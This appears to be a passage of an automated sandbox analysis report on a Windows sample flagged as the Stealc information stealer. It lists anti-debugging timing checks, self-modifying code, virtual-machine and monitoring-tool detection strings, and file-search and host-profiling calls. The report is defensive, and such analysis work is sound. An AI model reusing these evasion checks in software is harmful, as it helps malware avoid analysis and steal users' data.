                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39F77 second address: E39FAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3A30BBDF8Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 jmp 00007F3A30BBDF92h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E39FAA second address: E39FB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60059 second address: D6005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6005F second address: D60065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409BF second address: E409C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409C3 second address: E409CD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E409CD second address: E40A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30BBDF8Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jmp 00007F3A30BBDF98h 0x0000001a jmp 00007F3A30BBDF95h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E40A16 second address: E40A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4275D second address: E42761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E42761 second address: E42784 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3A30F498D4h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5192E second address: E51933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E53797 second address: E5379F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5379F second address: E537D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A30BBDF88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F3A30BBDF86h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E537D3 second address: E537DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E537DA second address: E537F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF97h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0B4 second address: E5B0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3A30F498D0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B0D6 second address: E5B0DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B639 second address: E5B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B63D second address: E5B641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7AB second address: E5B7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jg 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7BA second address: E5B7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B7C2 second address: E5B7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B947 second address: E5B94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A627 second address: E6A62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8C2 second address: E7A8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F3A30BBDF86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8D1 second address: E7A8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8D5 second address: E7A8F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F3A30BBDF86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3A30BBDF8Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7A8F0 second address: E7A8FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3A30F498C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CAFB second address: E7CB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jns 00007F3A30BBDF8Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7CB0C second address: E7CB26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F3A30F498C6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007F3A30F498C6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F3A30F498C6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C62F second address: E7C66D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3A30BBDF86h 0x00000009 jng 00007F3A30BBDF86h 0x0000000f jmp 00007F3A30BBDF91h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3A30BBDF99h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7C66D second address: E7C69D instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F3A30F498D3h 0x00000014 jmp 00007F3A30F498CDh 0x00000019 jmp 00007F3A30F498CFh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDE0 second address: E8DDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDE6 second address: E8DDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8DDEE second address: E8DE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF92h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E237 second address: E8E244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F3A30F498CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E35B second address: E8E374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF91h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E374 second address: E8E38A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jnp 00007F3A30F498D4h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E4EE second address: E8E513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3A30BBDF8Ah 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jg 00007F3A30BBDF86h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E513 second address: E8E538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A30F498D5h 0x0000000f jng 00007F3A30F498C6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E668 second address: E8E684 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A30BBDF86h 0x00000008 ja 00007F3A30BBDF86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007F3A30BBDF8Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90242 second address: E9024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9024E second address: E90260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30BBDF8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90260 second address: E9026D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A30F498C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9026D second address: E90273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92D62 second address: E92D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E92D66 second address: E92D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E930A0 second address: E930BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E930BA second address: E930BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E94B0D second address: E94B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F3A30F498C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946B4 second address: E946B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946B8 second address: E946C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F3A30F498DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E946C6 second address: E946DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF92h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E96648 second address: E9664E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52602A6 second address: 52602FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3A30BBDF92h 0x00000008 or ch, 00000038h 0x0000000b jmp 00007F3A30BBDF8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F3A30BBDF98h 0x00000019 sub cl, FFFFFF98h 0x0000001c jmp 00007F3A30BBDF8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bl, cl 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52602FB second address: 5260345 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F3A30F498D4h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A30F498CDh 0x00000018 sbb cx, B896h 0x0000001d jmp 00007F3A30F498D1h 0x00000022 popfd 0x00000023 movzx ecx, dx 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5260345 second address: 526034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526034B second address: 526034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BF1955 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DCD737 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DB4774 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E305CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0099DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0099E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0099ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F68A FindFirstFileA,0_2_0099F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0099BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991160 GetSystemInfo,ExitProcess,0_2_00991160
                Source: file.exe, file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareT
                Source: file.exe, 00000000.00000002.2090478959.00000000015E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPoa
                Source: file.exe, 00000000.00000002.2090478959.0000000001613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13698
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13643
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13646
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13662
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009945C0 VirtualProtect ?,00000004,00000100,000000000_2_009945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9750 mov eax, dword ptr fs:[00000030h]0_2_009A9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009A78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009A9600
                Source: file.exe, file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: n?;OProgram Manager
                Source: file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: on?;OProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009A7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_009A7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009A7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009A7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
